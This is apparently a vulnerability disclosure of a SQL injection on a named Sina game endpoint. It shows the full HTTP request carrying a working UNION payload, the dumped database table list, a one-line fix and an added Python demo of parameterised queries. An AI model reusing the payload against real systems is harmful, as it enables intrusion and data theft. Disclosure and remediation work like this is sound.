
SQL injection at a Sina Entertainment endpoint leaks multiple databases (UNION-capable)

Code block:
POST /ent/address.php HTTP/1.1
Host: game.ent.sina.com.cn
Proxy-Connection: keep-alive
Content-Length: 125
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://game.ent.sina.com.cn
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://game.ent.sina.com.cn/ent/user_address.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie:

opration=query_mail&mail_id=-7922 UNION ALL SELECT NULL,NULL,NULL,NULL,user(),NULL,NULL,NULL,NULL from ds_admin limit 1-- ---


Proof of vulnerability:

Code block:
Database: bookgames
[81 tables]
+------------------------------+
| ds_activit |
| ds_ad |
| ds_admin |
| ds_admin_log |
| ds_advertisement |
| ds_auction_action_log |
| ds_auction_address |
| ds_auction_gifts_config |
| ds_auction_give_price |
| ds_ct_app_cdkey_rewards |
| ds_ct_app_cdkeys |
| ds_ct_card_list |
| ds_event_choujiang_times |
| ds_event_duihuan_log |
| ds_event_prize_info |
| ds_game_company |
| ds_game_info |
| ds_game_server |
| ds_games |
| ds_gift |
| ds_gift_addtion |
| ds_gift_data |
| ds_gift_exchange_record |
| ds_gift_mail_info |
| ds_gift_photo |
| ds_gift_show_type |
| ds_gift_type |
| ds_guess |
| ds_guess_match |
| ds_guess_record |
| ds_guess_user_score |
| ds_guest_focus |
| ds_hqad |
| ds_jifen_prize_cdkey |
| ds_jifen_prize_gifts |
| ds_jifen_prize_record |
| ds_libao |
| ds_sign_lucky |
| ds_tag |
| ds_top_header_games |
| ds_user_compensate_score_log |
| ds_user_from |
| ds_user_inserver |
| ds_user_score_log |
| ds_user_score_total |
| ds_user_score_unusual_record |
| ds_user_small_games_0 |
| ds_user_small_games_1 |
| ds_user_small_games_2 |
| ds_user_small_games_3 |
| ds_user_small_games_4 |
| ds_user_small_games_5 |
| ds_user_small_games_6 |
| ds_user_small_games_7 |
| ds_user_small_games_8 |
| ds_user_small_games_9 |
| ds_users_0 |
| ds_users_1 |
| ds_users_2 |
| ds_users_3 |
| ds_users_4 |
| ds_users_5 |
| ds_users_6 |
| ds_users_7 |
| ds_users_8 |
| ds_users_9 |
| ds_vantages_gift_type |
| ds_web_games_record_0 |
| ds_web_games_record_1 |
| ds_web_games_record_2 |
| ds_web_games_record_3 |
| ds_web_games_record_4 |
| ds_web_games_record_5 |
| ds_web_games_record_6 |
| ds_web_games_record_7 |
| ds_web_games_record_8 |
| ds_web_games_record_9 |
| ds_zhenying_vote_active |
| ss_jifen_prize_cdkey |
| ss_jifen_prize_gifts |
| ss_jifen_prize_record |
+------------------------------+

Fix recommendation:

Filter the input.
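As an added example (not code from the original report or from the affected site), a toy Python/sqlite3 model of the `query_mail` lookup: the "before" version splices `mail_id` into the statement and so accepts the UNION payload shape shown above, while the fixed version whitelists the value as an integer and binds it as a parameter. The table names are taken from the report, but their columns and rows are constructed here and are not the real schema.

```python
import sqlite3

# Constructed schema and rows (hypothetical; the report lists only table names).
SCHEMA = """
CREATE TABLE ds_gift_mail_info (mail_id INTEGER, recipient TEXT, address TEXT);
CREATE TABLE ds_admin (id INTEGER, username TEXT, pw_hash TEXT);
INSERT INTO ds_gift_mail_info VALUES (1, 'alice', 'Beijing');
INSERT INTO ds_admin VALUES (1, 'admin', 'dummyhash');
"""

# Same shape as the reported payload, reduced to three columns for the toy schema.
UNION_PAYLOAD = "-7922 UNION ALL SELECT NULL,username,pw_hash FROM ds_admin LIMIT 1-- -"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def query_mail_vulnerable(conn, mail_id):
    # Before: the untrusted value becomes part of the SQL text, so a
    # UNION appended to mail_id is executed as a second SELECT.
    sql = ("SELECT mail_id, recipient, address FROM ds_gift_mail_info "
           "WHERE mail_id=" + str(mail_id))
    return conn.execute(sql).fetchall()


def query_mail_fixed(conn, mail_id):
    # After: reject anything that is not a plain decimal integer, then bind
    # the value as a parameter so the driver never parses it as SQL.
    if not str(mail_id).isdigit():
        raise ValueError("mail_id must be a non-negative integer")
    sql = ("SELECT mail_id, recipient, address FROM ds_gift_mail_info "
           "WHERE mail_id = ?")
    return conn.execute(sql, (int(mail_id),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(query_mail_vulnerable(db, 1))             # legitimate row
    print(query_mail_vulnerable(db, UNION_PAYLOAD))  # admin row leaks
    print(query_mail_fixed(db, "1"))                 # legitimate row
    try:
        query_mail_fixed(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```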
